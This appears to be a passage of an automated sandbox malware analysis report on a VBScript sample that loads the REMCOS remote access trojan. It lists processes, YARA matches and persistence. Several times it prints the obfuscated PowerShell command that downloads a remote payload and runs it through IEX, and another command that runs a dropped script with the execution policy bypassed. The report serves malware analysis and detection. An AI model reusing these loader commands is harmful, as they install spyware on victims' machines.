                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 16_2_0043E320
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 16_2_0044A3A8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 16_2_0043343D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 16_2_00437772
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 16_2_00422727
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 16_2_00433855
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 16_2_0042286A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 16_2_004379A1
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 16_2_00410ABB
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 16_2_0044AAB9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 16_2_00437BD0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 16_2_00421B92
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 16_2_00450BA0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 16_2_00418CF3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 16_2_00433C8A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 16_2_00430DF0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 16_2_0042DEA7
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 16_2_00432F41
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: String function: 0042EC70 appears 35 times
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: String function: 0042F2D0 appears 53 times
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: String function: 00402064 appears 80 times
                Source: Appraisa.vbsInitial sample: Strings found which are bigger than 50
                Source: 00000010.00000002.594396600.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                Source: 16.2.aspnet_compiler.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                Source: 16.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                Source: classification engineClassification label: mal100.troj.spyw.evad.winVBS@8/11@3/4
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 16_2_004131C5 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 16_2_0040D006 GetModuleFileNameW,CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,CreateMutexA,CloseHandle,
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 16_2_0040D277 FindResourceA,LoadResource,LockResource,SizeofResource,
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 16_2_00415BD3 OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\Documents\20210421Jump to behavior
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6648:120:WilError_01
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeMutant created: \Sessions\1\BaseNamedObjects\Remcos-8VMXRX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_nbyvf4gi.2e2.ps1Jump to behavior
                Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\wscript.exe 'C:\Users\user\Desktop\Appraisa.vbs'
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll
                Source: C:\Windows\System32\wscript.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\wscript.exe 'C:\Users\user\Desktop\Appraisa.vbs'
                Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' $v0 ='N#t.@@#b'.Replace('#','e').Replace('@@','w');$v00 = '%li!!'.Replace('%','C').Replace('!!','ent');$V000 = 'D$$$$$$$$$$$n%%%%%%%%%%%%ng'.Replace('%%%%%%%%%%%%','loadStri').Replace('$$$$$$$$$$$','ow');$v1 = '$e^'.replace('$','I').replace('^','x');$v9999 = '(Ne`W&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&00(''https://ia601509.us.archive.org/35/items/all_20210420_20210420_1440/ALL.TXT'')'.Replace('&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&','-O`BjEcT $v0$v00 ).$V0');$TC=I`E`X ($v9999 -Join '')|I`E`X
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -windo 1 -noexit -exec bypass -file 'C:\Users\Public\ Microsoft.ps1'
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' $v0 ='N#t.@@#b'.Replace('#','e').Replace('@@','w');$v00 = '%li!!'.Replace('%','C').Replace('!!','ent');$V000 = 'D$$$$$$$$$$$n%%%%%%%%%%%%ng'.Replace('%%%%%%%%%%%%','loadStri').Replace('$$$$$$$$$$$','ow');$v1 = '$e^'.replace('$','I').replace('^','x');$v9999 = '(Ne`W&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&00(''https://ia601509.us.archive.org/35/items/all_20210420_20210420_1440/ALL.TXT'')'.Replace('&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&','-O`BjEcT $v0$v00 ).$V0');$TC=I`E`X ($v9999 -Join '')|I`E`X
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -windo 1 -noexit -exec bypass -file 'C:\Users\Public\ Microsoft.ps1'
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll

                Data Obfuscation:

                barindex
                VBScript performs obfuscated calls to suspicious functionsShow sources
                Source: C:\Windows\System32\wscript.exeAnti Malware Scan Interface: .Run("powershell $v0 ='N#t.@@#b'.Replace('#','e').Replace('@@','w');$v00 = '%li!!'.Replace('%','C').Replace('!!','ent')", "0")
                Obfuscated command line foundShow sources
                Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' $v0 ='N#t.@@#b'.Replace('#','e').Replace('@@','w');$v00 = '%li!!'.Replace('%','C').Replace('!!','ent');$V000 = 'D$$$$$$$$$$$n%%%%%%%%%%%%ng'.Replace('%%%%%%%%%%%%','loadStri').Replace('$$$$$$$$$$$','ow');$v1 = '$e^'.replace('$','I').replace('^','x');$v9999 = '(Ne`W&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&00(''https://ia601509.us.archive.org/35/items/all_20210420_20210420_1440/ALL.TXT'')'.Replace('&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&','-O`BjEcT $v0$v00 ).$V0');$TC=I`E`X ($v9999 -Join '')|I`E`X
                Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' $v0 ='N#t.@@#b'.Replace('#','e').Replace('@@','w');$v00 = '%li!!'.Replace('%','C').Replace('!!','ent');$V000 = 'D$$$$$$$$$$$n%%%%%%%%%%%%ng'.Replace('%%%%%%%%%%%%','loadStri').Replace('$$$$$$$$$$$','ow');$v1 = '$e^'.replace('$','I').replace('^','x');$v9999 = '(Ne`W&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&00(''https://ia601509.us.archive.org/35/items/all_20210420_20210420_1440/ALL.TXT'')'.Replace('&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&','-O`BjEcT $v0$v00 ).$V0');$TC=I`E`X ($v9999 -Join '')|I`E`X
                Yara detected MSILLoadEncryptedAssemblyShow sources
                Source: Yara matchFile source: 00000001.00000002.603198736.000001E837AF7000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 6632, type: MEMORY
                Source: Yara matchFile source: C:\Users\Public\ Microsoft.ps1, type: DROPPED
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 16_2_0040CEDF LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 16_2_0042F316 push ecx; ret
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 16_2_00456330 push esp; ret
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 16_2_00457435 push esi; ret
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 16_2_00450558 push eax; ret
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 16_2_0044FC36 push ecx; ret
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 16_2_00405C3E ShellExecuteW,URLDownloadToFileW,

                Boot Survival:

                barindex
                Creates an undocumented autostart registry key Show sources
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeKey value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders StartupJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 16_2_00415BD3 OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 16_2_0040CEDF LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,
                Source: C:\Windows\System32\wscript.exeRegistry key monitored for changes: HKEY_CURRENT_USER_Classes
                Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
